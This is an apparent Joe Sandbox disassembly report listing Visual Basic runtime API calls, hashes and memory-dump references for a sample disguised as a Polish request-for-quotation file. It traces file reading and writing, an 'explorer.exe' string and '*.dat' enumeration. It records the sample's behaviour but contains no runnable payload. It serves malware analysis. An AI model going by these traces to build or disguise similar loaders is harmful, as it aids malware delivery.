                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004217D5
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042161E
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421604
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421663
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000,?,00000000), ref: 00421666
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421679
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 0042167D
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A,?,00000000), ref: 00421695
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004216A4
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 004216B0
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?,00000000), ref: 004216BA
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00001000,?,00000000), ref: 004216C5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 004216D0
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004216D8
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000,?,00000000), ref: 004216DB
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421712
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042171B
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421723
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042172C
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,00000000), ref: 00421744
                                                                                                                                                                                                                                                      • #525.MSVBVM60(-00000001,?,00000000), ref: 00421764
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0042176F
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421777
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421780
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421788
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421791
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,00000000), ref: 0042179E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217E9
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0041127A
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217FD
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421805
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042180E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 00421822
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042182D
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00421830
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00421839
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042184F
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00421858
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0042185D
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00421860
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00421869
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004218B2), ref: 004218A0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004218A5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004218AA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004218AF
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004218C9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 936154001-0
                                                                                                                                                                                                                                                      • Opcode ID: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                                                                                                                                                                                      • Instruction ID: 6fbf1135f095249bf70c03af9044da0b22cab9efce2ca8aeaf0a64a19547a855
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7B11B75E002589FCB04EFE4DE88AEEBBB9EF48341F10412AE506E72A4DB785945CF54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DC0E
                                                                                                                                                                                                                                                      • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,?,Function_000032B6), ref: 0040DC57
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DC66
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DC7E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DCA8
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0040DCD1
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,Function_000032B6), ref: 0040DD2F
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0040DD69
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040DD7F
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0040DD98
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000104), ref: 0040DDC1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040DDCC
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040DE03
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE42
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040DE5D
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040DE83
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040DE94
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040DEA9
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,?), ref: 0040DEBE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040DECC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040DEE6
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0040DEED
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040DEF8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DF0E
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DF22
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040DF58
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,Function_000032B6), ref: 0040DFC0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DFDA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040DFF5
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,?,?,Function_000032B6), ref: 0040DFFC
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,Function_000032B6), ref: 0040E027
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040E04A
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040E064
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0AB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040E0C1
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0DA
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0040E0FE
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E182
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040E19B
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0040E1BA
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040E1CC
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E242
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040E25A
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0040E279
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040E28B
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                      • #598.MSVBVM60 ref: 0040E298
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0040E305), ref: 0040E2DD
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040E2F5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040E2FE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A090: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                                                                                                                                                                                        • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                                                                                                                                                                                        • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$FreeMoveSystem$Copy$Ansi$Chkstk$Bstr$#525#580FileListUnicode$#570#600#616#648Open$#517#529#598BoundsConstruct2DestructGenerateGet3Get4Seek
                                                                                                                                                                                                                                                      • String ID: PR$ SE$>
                                                                                                                                                                                                                                                      • API String ID: 1583011778-1191765531
                                                                                                                                                                                                                                                      • Opcode ID: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                                                                                                                                                                                      • Instruction ID: f905f382651ed8b103fe9430cada2d1d943483e90bd52cba87cb48a71c5da37b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7122D75A01219EBDB14DFA0DE88BDE7BB4FF48304F1081A9E505B72A0DB785A85CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE27
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE44
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?), ref: 0041BE64
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BE72
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041BE7E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BE89
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041BE95
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(004055BC,?,?), ref: 0041BEB5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(*.dat,?,00000000), ref: 0041BEC5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041BED3
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041BEE1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041BEF3
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(004055BC,?,?), ref: 0041BF0C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BF2B
